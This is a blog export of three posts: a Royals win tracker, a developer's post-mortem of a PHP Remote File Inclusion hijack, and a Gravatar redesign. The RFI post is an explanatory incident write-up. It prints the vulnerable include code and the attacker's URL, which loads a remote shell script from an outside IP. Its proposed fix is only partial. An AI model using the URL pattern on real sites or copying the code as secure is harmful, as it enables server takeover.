The Kansas City Royals are having a great season. Especially in light of "recent history":http://en.wikipedia.org/wiki/Kansas_City_Royals#2002.E2.80.932006:_Rock_bottom. One of the fringe benefits of their winning season is the almost constant availability of "cheap turkey sub sandwiches at Planet Sub":http://kansascity.royals.mlb.com/kc/ticketing/ways_to_win.jsp#planetsub. For the uninitiated, Planet Sub offers $2 turkey subs on the day after a Royals win -- home or away. Well, the night of the Royals home opener, I had an idea. The Royals play a lot of games in a season. So when it comes lunch time, it's hard to always know whether the team won the day before. So I spent about an hour and a half in front of my computer and conceived "Two Dollar Turkey":http://www.twodollarturkey.com, aka "http://www.twodollarturkey.com":http://www.twodollarturkey.com. I don't manually update the site. It runs itself. Every day, it just goes and reads yesterday's sports scores and displays whether or not the Royals won -- Yes or No. I hope this feat of technological wonder enhances your world (and your lunch). 0 true 2009-05-28T15:07:12-07:00 article false 20 false two-dollar-turkey true 2009-05-28T15:22:50-07:00 2009-06-18T15:36:21-07:00 <img src="http://joncrawford.com/system/images/php.gif" class="photoleft" style="background:0;" /> A panicked client of mine contacted me today with concerns about his website. Every few times we would load his company's homepage, it would show an incorrect website. This site had links to p0rn and other subject matter that a fine business would deem unfit to put on the front page of its website. <a href="http://skitch.com/newmonarch/j254/not-the-correct-website" target="_blank">See the page that was being maliciously loaded here</a>. So I got to work hunting down the source of the hijack. =more= With some help from the gurus at "HostGator":http://hostgator.com support, I finally found out how this was happening. The answer: RFI ("Remote File Inclusion") Attack. Most of our small websites we do in PHP. I pass off all of my PHP work to my code monkeys these days. The benefits and sanity that come from Ruby on Rails make it almost impossible for me to even look at PHP without feeling dizzy. The developer for this site unwittingly used a small piece of vulnerable code that basically allowed any hacker to make the website his own personal playground. h3. Vulnerable Code <notextile> <pre lang="php"> #example http://bellchem.com/products.php?page=tech #example http://bellchem.com/products.php?page=nutrition $page = $_GET['page']; include $page . ".php"; </pre> </notextile> What a lot of PHP developers don't know is that the <code>include()</code> function will actually allow you to include even a remote file. So one could write <code>include('http://apple.com'); </code>, for instance, and insert the code from Apple's website into the body of their own site. And to take it even one step further, the function doesn't just include remote content. It also *EXECUTES* the included code. This means that with a hole like this in your code, a hacker could write any PHP script they wanted to and then just include it in your URL and *_your web server will run it!_* And that's exactly what our hacker did. h3. Malicious URL Used By Hacker <pre>http://website.com/products.php?page=http://141.84.238.34/.../cmd?</pre> Upon including "http://141.84.238.34/.../cmd?" at the end of url, it loaded up a simple yet impressive file management panel right in the middle of my beautiful website. <a href="http://skitch.com/newmonarch/j255/malicious-upload-form-exploit" target="_blank">Take a look</a>. It's really quite impressive. As you can see, from here the attacker can completely manipulate the entire filesystem and even execute shell commands on the server. This attacker used this opportunity to redirect to a site of which he or she must've had some interest in the advertising revenue. Well, the password has been changed and the vulnerability has been closed. I'm sure there is more than one way to secure this hole, but here is how I did it. h3. Cleaned Up Version <span class="quiet small">Won't execute remote code</span> <notextile> <pre lang="php"> $page = $_GET['page']; # Checks to see if file even exists locally before loading it. if (file_exists("./$page.php")) include $page.".php"; else echo "There has been a problem."; </pre> </notextile> <span class="small quiet">The full dish: "RFI Attack on Wikipedia":http://en.wikipedia.org/wiki/Remote_File_Inclusion</span> 0 false 2008-04-17T22:20:13-07:00 article false 6 false nasty-php-exploit-rears-its-ugly-head-rfi-attack true 2008-04-17T23:50:29-07:00 2009-12-15T11:38:51-08:00 After being online for only a few short days, I started to really hate the design of this website. It was too dark or something. I wanted it to feel more open and easy-going and it just plain didn't. I promised to stop messing with it for a while now though. I also added "Gravatar":http://gravatar.com integration for comments. A Gravatar is a "globally recognizable avatar". It's a central server for avatars. My website calls out to the Gravatar server and looks a commenter up by their email address. If they've registered with Gravatar, their photo will be returned and placed neatly next to their comment. If they haven't registered they'll get an ugly Gravatar logo next to their comment. Neat, huh? Registering is easy and fast, and more and more sites are starting to use the service. So "go register":http://en.gravatar.com/. =more= Plugging Gravatar into Rails was unbelievably simple. I just grabbed the "Gravatar plugin":http://gravatarplugin.rubyforge.org. And wrote this line where the picture should go:<pre> <%= gravatar_for comment.email %> </pre> and BLAM. Hello Gravatar! h3. Features still to add to site: * Syntax highlighting for code. * Different formatting for different entry types. (Posts, Quotes, Links) * Some kind of unnecessary javascript effect to impress site-comers. 0 true 2008-04-11T09:29:25-07:00 article false 3 false design-changed-gravatars-added true 2008-04-11T13:52:19-07:00 2009-05-08T07:47:46-07:00